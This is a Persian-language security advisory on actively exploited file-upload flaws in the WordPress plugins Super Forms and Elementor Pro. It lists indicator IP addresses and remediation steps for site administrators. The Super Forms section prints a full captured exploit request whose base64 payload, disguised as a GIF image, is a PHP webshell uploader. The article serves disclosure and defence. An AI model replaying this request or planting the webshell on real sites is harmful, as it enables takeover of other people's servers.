کارشناسان امنیتی نسبت به موج گسترده ای از حملات سایبری به دو افزونه محبوب وردپرسی یعنی Elementor Pro و Super Forms هشدار داده اند. گزارش های تیم امنیتی Wordfence نشان می دهد که تاکنون بیش از ۴۴۰ هزار تلاش برای بهره برداری از این دو آسیب پذیری بحرانی مسدود شده است؛ نقص هایی که می توانند به هکرها اجازه دهند کنترل کامل وب سایت شما را در دست بگیرند.
به گزارش بخش اخبار امنیت سایبری، دو آسیب پذیری بسیار خطرناک با شدت بحرانی (امتیاز 9.8 از 10) در افزونه های وردپرسی شناسایی شده اند که هم اکنون به طور فعال توسط مهاجمان در حال اکسپلویت (سوء استفاده) هستند. مشکل اصلی در هر دو افزونه، امکان آپلود فایل های مخرب بدون نیاز به احراز هویت است که در نهایت به اجرای کد دلخواه روی سرور (RCE) منجر میشود.
در ادامه این دو آسیب پذیری به صورت دقیق تر بررسی می گردند:
1- آسیب پذیری CVE-2026-14894 در افزونه Super Forms
این نقص امنیتی در افزونه فرم ساز Super Forms – Drag & Drop Form Builder شناسایی شده است.
شناسه آسیب پذیری: CVE-2026-14894
امتیاز امنیتی (CVSS): 9.8 از 10 (بحرانی)
نسخه ایمن (پچ شده): این باگ در نسخه 6.3.314 رفع شده است.
آمار حملات: بیشتر از 250 هزار تلاش مسدود شده
نحوه سوء استفاده مهاجمان: مهاجمان احراز هویت نشده میتوانند فایل های خود را با هر نوع پسوند، از جمله فایل های اجرایی PHP روی سایت آپلود کنند. در حملات شناسایی شده، مهاجم یک درخواست HTTP POST به مسیر wp-admin/admin-ajax.php ارسال می کند. این درخواست نقطه پایانی (Endpoint) مربوط به super_submit_form را هدف قرار میدهد و حاوی یک payload کدگذاری شده با Base64 است.
نمونه درخواست شناسایی شده:
action=super_submit_form&form_id=2&sf_nonce=04c3aa2046&data={"sf_upload_field": {"type": "files", "files": [{"datauristring": "data:image/gif;base64,PD9waHAgaWYoaXNzZXQoJF9GSUxFU1siZmlsZSJdKSl7JHRhcmdldD1iYXNlbmFtZSgkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSk7aWYobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSwkdGFyZ2V0KSl7ZWNobyLinIUgVXBsb2FkZWQ6IDxhIGhyZWY9JyR0YXJnZXQnPiR0YXJnZXQ8L2E+Ijt9ZWxzZXtlY2hvIuKdjCBVcGxvYWQgZmFpbGVkISI7fWV4aXQ7fT8+PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PHRpdGxlPk11c2hyMDB3IFVwbG9hZGVyPC90aXRsZT48L2hlYWQ+PGJvZHkgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2ZvbnQtZmFtaWx5Om1vbm9zcGFjZTtkaXNwbGF5OmZsZXg7anVzdGlmeS1jb250ZW50OmNlbnRlcjthbGlnbi1pdGVtczpjZW50ZXI7aGVpZ2h0OjEwMHZoO21hcmdpbjowOyI+PGZvcm0gbWV0aG9kPSJQT1NUIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBzdHlsZT0iYmFja2dyb3VuZDojMTExO3BhZGRpbmc6NDBweDtib3JkZXI6MnB4IHNvbGlkICMwMGZmMDA7Ym9yZGVyLXJhZGl1czoxMHB4O3RleHQtYWxpZ246Y2VudGVyOyI+PGgyPvCfk6QgVVBMT0FEPC9oMj48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgcmVxdWlyZWQgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2JvcmRlcjoxcHggc29saWQgIzAwZmYwMDtwYWRkaW5nOjEwcHg7Ym9yZGVyLXJhZGl1czo1cHg7Ij48YnI+PGJyPjxidXR0b24gdHlwZT0ic3VibWl0IiBzdHlsZT0iYmFja2dyb3VuZDojMDBmZjAwO2NvbG9yOiMwYTBhMGE7cGFkZGluZzoxMHB4IDMwcHg7Ym9yZGVyOm5vbmU7Ym9yZGVyLXJhZGl1czo1cHg7Zm9udC13ZWlnaHQ6Ym9sZDtjdXJzb3I6cG9pbnRlcjsiPuKshiBVcGxvYWQ8L2J1dHRvbj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4=", "value": "Mushr00w_upl.php", "name": "Mushr00w_upl.php", "label": "attachment"}]}}
اگرچه فایل آپلود شده در ابتدا با نوع محتوا data:image/gif;base64 (به عنوان تصویر) معرفی میشود، اما در واقع یک webshell آپلود کننده فایل PHP با نام Mushr00w_upl.php است که راه را برای آپلود payload های مخرب (بخش اصلی کد مخرب که وظیفه اجرا عملیات خرابکارانه را بر عهده دارد) بعدی هموار میکند.
آدرس IP های شناسایی شده مهاجمان:
براساس گزارش Wordfence، حملاتی که افزونه Super Forms را هدف قرار داده اند از IP های زیر بوده است:
103.168.147.235
103.168.146.131
103.154.152.178
103.170.97.7
182.10.130.51
189.4.122.140
129.227.46.143
64.176.209.104
103.164.182.122
37.9.33.62
گفته می شود شروع حملات این آسیب پذیری از 14 ژوئیه 2026 آغاز شده و در 18 آگوست 2026 به اوج خود رسیده است.

تصویر(1)
2- آسیب پذیری CVE-2026-32475 در افزونه Elementor Pro
افزونه Elementor Pro نیز درگیر یک نقص امنیتی مشابه و به همان اندازه خطرناک شده است.
شناسه آسیب پذیری: CVE-2026-32475
امتیاز امنیتی (CVSS): 9 از 10 (بحرانی)
نسخه ایمن (پچ شده): باگ در نسخه 4.2.2 برطرف شده است.
آمار حملات: بیشتر از 190 هزار تلاش مسدود شده
نحوه سوء استفاده مهاجمان: مهاجم فیلد File Upload را به صورت یک آرایه ارسال میکند. عنصر اول آرایه خالی است و عنصر دوم شامل یک payload با پسوند php است. به گفته Wordfence، همین ساختار باعث دور زدن مکانیزم اعتبارسنجی فایل میشود.
آدرس IP های شناسایی شده مهاجمان:
تلاش های سوء استفاده از این آسیب پذیری از 19 آگوست 2026 آغاز شده و از IP های زیر مشاهده شده اند:
2602:fa59:10:7a1::1
185.196.220.85
103.84.230.85
103.90.148.202
216.126.225.208
167.254.240.75
167.254.241.119
114.10.17.253
114.10.45.151
2406:ef80:2:7d19::1
توصیه های امنیتی فوری به مدیران سایت های وردپرسی
با توجه به اینکه این آسیب پذیری ها در حال حاضر به صورت فعال مورد سوء استفاده قرار میگیرند، صرفا به روزرسانی افزونه کافی نیست و بررسی احتمال نفوذ نیز الزامی است.
اقدامات ضروری:
1- به روزرسانی فوری: افزونه Super Forms را به نسخه 6.3.314 (یا بالاتر) و Elementor Pro را به نسخه 4.2.2 (یا بالاتر) ارتقا دهید.
2- بررسی نشانه های نفوذ (IoC): سایت را از نظر وجود فایل های PHP جدید و ناشناس با دقت بررسی نمایید.
3- کنترل فایل های اخیر: فایل های PHP که اخیرا ایجاد یا تغییر داده شده اند را بررسی نمایید.
4- بررسی کاربران سایت: حساب های کاربری جدید و غیرعادی، به خصوص حساب های دارای نقش مدیر کل (Administrator) را چک کرده و کاربران مشکوک را حذف کنید.
5- تحلیل لاگ ها: لاگ های وب سرور و وردپرس (Access Logs) را برای یافتن درخواست های مشکوک (به خصوص از سمت IP های مخرب ذکر شده) بررسی نمایید.